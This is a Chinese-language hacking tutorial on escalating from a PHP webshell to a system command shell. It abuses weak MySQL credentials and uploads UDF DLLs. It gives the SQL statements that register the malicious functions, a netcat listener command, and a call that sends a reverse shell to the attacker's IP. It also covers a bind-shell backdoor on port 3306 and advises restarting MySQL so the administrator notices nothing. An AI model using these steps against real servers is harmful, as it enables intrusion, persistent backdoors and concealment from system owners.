WEBSHELL提升權限又一招(Mysql漏洞)
MYSQLl弱口令可以拿到系統權限,在WEBSHEL上也可實現,不過有個前提,就是目標主機裝有MYSQL,而你又知道MYSQL的用戶和密碼,才能進行提權。WEBSHELL獲得了,找用戶和密碼也不是什么難事。目前我拿我另外一臺機器做示范,已把PHPSHELL傳上去了,如圖1
一般來說連接MYSQL的帳戶密碼非常好找,隨便編輯一個PHP文件,就看到了。如圖2
看到了吧,用戶名:root 密碼:123456 庫名:php 然后怎么辦呢?先用SQL Query 建立連接,如圖3
連接成功了,目前開始將我們的提權用滴東東:Mix.dll My_udf.dll上傳上去先.OK,傳好了,Mix.dll用于反彈連接,My_udf.dll是正向連接,直接用連接對方的3306端口然后輸入密碼就可獲得CMDSHELL。好,不多說了,傳上去之后呢就執行以下SQL語句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 來注冊函數.
出現SQL語句成功執行!如圖4
離拿到CMDSHELL已不遠了,我們先用NC在本地監聽一個端口先,Nc -l -p 1234 (這個我想不用截圖了吧)而后執行語句:select Mixconnect('192.168.1.254','1234'); 來激活那個函數,如圖5
執行成功,然后看看我們的NC有反映沒,如圖6
成功得到CMSHELL,不過這時對方的MYSQL已假死咯,我們要把MYSQL服務進程給kill掉,然后重新啟動MYSQL服務才行,不然管理員發現網站運行不了了,那就。。。。如果該服務器不允許連接所有外部IP和端口,而他的3306端口卻是對外開的!這時My_udf.dll就該上場了,使用方法和Mix相同,連接MYSQL成功后執行如下語句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 執行語句成功后,然后我們就開始激活這個函數,輸入語句:select my_udfdoor (''); 然后用nc連接3306端口,然后輸入f**k 就能得到一個cmdshell了如圖7
測試結束
WEBSHELL提升權限的技巧(Mysql漏洞)大家應該掌握了,希望大家多多了解這方面的知識。
【編輯推薦】